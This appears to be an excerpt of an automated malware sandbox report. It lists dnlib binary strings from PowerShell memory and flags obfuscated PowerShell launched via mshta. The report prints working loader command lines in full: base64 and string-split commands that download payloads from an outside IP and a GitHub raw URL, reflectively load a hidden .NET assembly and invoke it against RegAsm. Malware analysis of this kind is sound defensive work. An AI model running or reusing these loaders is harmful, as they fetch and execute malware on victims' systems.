                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUnresolvedMethods source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineNestedType source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17 source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetRVA source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleFromScope source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethodImpl source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePinvokeMap source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetClassLayout source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineSecurityAttributeSet source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMemberRef source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPermissionSetProps source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetTypeDefProps source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineProperty source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeDefByName source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetModuleProps source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldRVA source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFieldsWithName source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMemberRefs source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResolveTypeRef source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToStream source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodSemantics source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeDefProps source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNestedClassProps source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMethod source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeletePinvokeMap source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromTypeSpec source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodImplFlags source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPinvokeMap source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumSignatures source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPinvokeMap source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldMarshal source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUserStrings source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetRVA source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePermissionSet source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodProps source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPropertyProps source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.dotnet.pdb.managed source: powershell.exe, 00000009.00000002.2279074921.0000000006BD0000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetUserString source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetInterfaceImplProps source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldMarshal source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeDef source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeDefs source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportMember source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumInterfaceImpls source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberProps source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportType source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromSig source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumEvents source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamForMethodIndex source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineField source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsGlobal source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodsWithName source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetEventProps source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp

                      Data Obfuscation

                      barindex
                      Found suspicious powershell code related to unpacking or dynamic code loading
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: $Codigo = 'KCd0ZycrJzRpbWFnZVVybCA9IE5sTGh0dCcrJ3BzOi8vJysncmF3LmdpdGh1YnVzZXJjbycrJ250ZW50LmNvbS9DcnlwdGVyc0FuZFRvb2xzT2ZpY2lhbC9aSVAvcmVmcy9oZScrJ2FkJysncy9tYWluL0QnKydldGFoTm90ZV9WLmpwZyBObEw7dGc0d2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDt0ZzRpbWFnZUInKyd5dGVzID0gdGc0d2ViQ2xpZW50LkRvd25sb2EnKydkRGF0YSh0ZzRpbWFnZVVybCk7dGc0aW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kJysnaW5nXTo6VVRGOC5HZXRTdHJpbmcodGc0aW1hZ2VCeXRlcyk7dGc0c3RhcnRGbGFnID0gTmxMPDxCQVNFNjRfU1RBUlQ+Pk5sJysnTDt0ZzRlbmRGbGFnID0gTmxMPDxCQVMnKydFNjRfRU5EPj5ObEw7dCcrJ2c0c3RhcnRJbmRleCA9IHRnNGltYWdlVGV4dC5JbmRleE9mKHRnNHN0YXJ0RmxhZyk7dGc0ZW5kSW5kZXggPSB0ZzRpbWFnZVQnKydleHQuSW5kZXhPZih0ZzRlbmRGbGFnKTt0ZzRzdGFydEluZGV4JysnIC1nJysnZSAwIC1hbmQgdGc0ZW5kSW5kZXggLWd0IHRnNHN0YXJ0SW5kZXg7dGc0cycrJ3RhcnRJbmRleCArPSB0ZzRzdGFydEZsYWcuTGVuZ3RoO3RnNGJhc2U2NExlbmd0aCA9IHRnNGVuZEluZGV4IC0gdGc0c3RhcnRJbmRleDt0ZzRiYXNlNjRDb21tYW5kJysnID0gdGc0aW1hZ2VUZXh0LlN1YnN0cmluZygnKyd0ZzRzdGFydEluZGV4LCB0ZzRiYXNlNjRMZW5ndGgpO3RnNGNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydCcrJ106OkYnKydyb21CYXNlNjRTdHJpbmcodGc0YmFzZTY0Q29tbWFuZCk7dGc0bG9hZGVkQXNzZW1ibCcrJ3kgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKHRnNGNvbW1hbmRCeScrJ3RlJysncyk7dGc0dmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZChObExWQScrJ0lObEwpO3RnNHZhaScrJ01ldGhvZCcrJy5JbnZva2UodGc0bnVsbCwgQChObCcrJ0x0eHQuRUNDRlJSLzA1NC8wNC4wMjIuMy4yOTEvLzpwdHRoTmwnKydMLCBObExkZXNhdCcrJ2l2YWRvTicrJ2xMLCBObExkZXNhdGl2YWRvTmxMLCBObExkZXNhdGl2YWRvTmxMLCBObExSZWdBc21ObEwsIE5sTGRlc2F0aXZhZG9ObEwsIE5sTGRlc2F0aXZhZG9ObEwpKTsnKS5SRVBsQWNlKCd0ZzQnLFtzVHJJbkddW2NoQXJdMzYpLlJFUGxBY2UoKFtjaEFyXTc4K1tjaEFyXTEwOCtbY2hBcl03NiksW3NUckluR11bY2hBcl0zOSkgfCAuICgoZ1YgJypNZFIqJykuTmFtZVszLDExLDJdLUpvSU4nJyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD$global:?
                      Obfuscated command line found
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('tg'+'4imageUrl = NlLhtt'+'ps://'+'raw.githubuserco'+'ntent.com/CryptersAndToolsOficial/ZIP/refs/he'+'ad'+'s/main/D'+'etahNote_V.jpg NlL;tg4webClient = New-Object System.Net.WebClient;tg4imageB'+'ytes = tg4webClient.Downloa'+'dData(tg4imageUrl);tg4imageText = [System.Text.Encod'+'ing]::UTF8.GetString(tg4imageBytes);tg4startFlag = NlL<<BASE64_START>>Nl'+'L;tg4endFlag = NlL<<BAS'+'E64_END>>NlL;t'+'g4startIndex = tg4imageText.IndexOf(tg4startFlag);tg4endIndex = tg4imageT'+'ext.IndexOf(tg4endFlag);tg4startIndex'+' -g'+'e 0 -and tg4endIndex -gt tg4startIndex;tg4s'+'tartIndex += tg4startFlag.Length;tg4base64Length = tg4endIndex - tg4startIndex;tg4base64Command'+' = tg4imageText.Substring('+'tg4startIndex, tg4base64Length);tg4commandBytes = [System.Convert'+']::F'+'romBase64String(tg4base64Command);tg4loadedAssembl'+'y = [System.Reflection.Assembly]::Load(tg4commandBy'+'te'+'s);tg4vaiMethod = [dnlib.IO.Home].GetMethod(NlLVA'+'INlL);tg4vai'+'Method'+'.Invoke(tg4null, @(Nl'+'Ltxt.ECCFRR/054/04.022.3.291//:ptthNl'+'L, NlLdesat'+'ivadoN'+'lL, NlLdesativadoNlL, NlLdesativadoNlL, NlLRegAsmNlL, NlLdesativadoNlL, NlLdesativadoNlL));').REPlAce('tg4',[sTrInG][chAr]36).REPlAce(([chAr]78+[chAr]108+[chAr]76),[sTrInG][chAr]39) | . ((gV '*MdR*').Name[3,11,2]-JoIN'')"
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('tg'+'4imageUrl = NlLhtt'+'ps://'+'raw.githubuserco'+'ntent.com/CryptersAndToolsOficial/ZIP/refs/he'+'ad'+'s/main/D'+'etahNote_V.jpg NlL;tg4webClient = New-Object System.Net.WebClient;tg4imageB'+'ytes = tg4webClient.Downloa'+'dData(tg4imageUrl);tg4imageText = [System.Text.Encod'+'ing]::UTF8.GetString(tg4imageBytes);tg4startFlag = NlL<<BASE64_START>>Nl'+'L;tg4endFlag = NlL<<BAS'+'E64_END>>NlL;t'+'g4startIndex = tg4imageText.IndexOf(tg4startFlag);tg4endIndex = tg4imageT'+'ext.IndexOf(tg4endFlag);tg4startIndex'+' -g'+'e 0 -and tg4endIndex -gt tg4startIndex;tg4s'+'tartIndex += tg4startFlag.Length;tg4base64Length = tg4endIndex - tg4startIndex;tg4base64Command'+' = tg4imageText.Substring('+'tg4startIndex, tg4base64Length);tg4commandBytes = [System.Convert'+']::F'+'romBase64String(tg4base64Command);tg4loadedAssembl'+'y = [System.Reflection.Assembly]::Load(tg4commandBy'+'te'+'s);tg4vaiMethod = [dnlib.IO.Home].GetMethod(NlLVA'+'INlL);tg4vai'+'Method'+'.Invoke(tg4null, @(Nl'+'Ltxt.ECCFRR/054/04.022.3.291//:ptthNl'+'L, NlLdesat'+'ivadoN'+'lL, NlLdesativadoNlL, NlLdesativadoNlL, NlLRegAsmNlL, NlLdesativadoNlL, NlLdesativadoNlL));').REPlAce('tg4',[sTrInG][chAr]36).REPlAce(([chAr]78+[chAr]108+[chAr]76),[sTrInG][chAr]39) | . ((gV '*MdR*').Name[3,11,2]-JoIN'')"Jump to behavior
                      PowerShell case anomaly found
                      Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SYSTEM32\wInDoWspoWERsheLl\v1.0\pOwerSHelL.EXe" "PowErsheLl.ExE -Ex byPaSs -nop -W 1 -c DevicECrEdentiaLdEploymeNt.eXe ; IEx($(IeX('[SYStEm.tEXt.enCoDing]'+[cHaR]58+[chaR]58+'Utf8.gEtsTRiNg([sYstEM.CoNVErT]'+[cHar]58+[ChaR]0x3a+'FromBaSE64sTrIng('+[chAR]34+'JEcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFERC10WVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVNYkVyZGVmaW5JdGlPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBHbWZScFV0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUE1kWHZOLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRnQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXh4c2lBU0hmLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeEhXU3kpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZ3VNcGJiZUdkVyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1lU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9NenpHY015TiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJEc6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yMjAuNDAvNDUwL3NlZXRoZWJlc3RwcmljZXdpdGhnb29kY29va2llc21lLnRJRiIsIiRFblY6QVBQREFUQVxzZWV0aGViZXN0cHJpY2V3aXRoZ29vZGNvb2tpZXNtLnZiUyIsMCwwKTtzVGFSVC1zTGVlUCgzKTtTVGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVxzZWV0aGViZXN0cHJpY2V3aXRoZ29vZGNvb2tpZXNtLnZiUyI='+[ChAr]0X22+'))')))"
                      Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SYSTEM32\wInDoWspoWERsheLl\v1.0\pOwerSHelL.EXe" "PowErsheLl.ExE -Ex byPaSs -nop -W 1 -c DevicECrEdentiaLdEploymeNt.eXe ; IEx($(IeX('[SYStEm.tEXt.enCoDing]'+[cHaR]58+[chaR]58+'Utf8.gEtsTRiNg([sYstEM.CoNVErT]'+[cHar]58+[ChaR]0x3a+'FromBaSE64sTrIng('+[chAR]34+'JEcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFERC10WVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVNYkVyZGVmaW5JdGlPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBHbWZScFV0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUE1kWHZOLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRnQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXh4c2lBU0hmLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeEhXU3kpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZ3VNcGJiZUdkVyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1lU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9NenpHY015TiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJEc6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yMjAuNDAvNDUwL3NlZXRoZWJlc3RwcmljZXdpdGhnb29kY29va2llc21lLnRJRiIsIiRFblY6QVBQREFUQVxzZWV0aGViZXN0cHJpY2V3aXRoZ29vZGNvb2tpZXNtLnZiUyIsMCwwKTtzVGFSVC1zTGVlUCgzKTtTVGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVxzZWV0aGViZXN0cHJpY2V3aXRoZ29vZGNvb2tpZXNtLnZiUyI='+[ChAr]0X22+'))')))"Jump to behavior
                      Suspicious powershell command line found
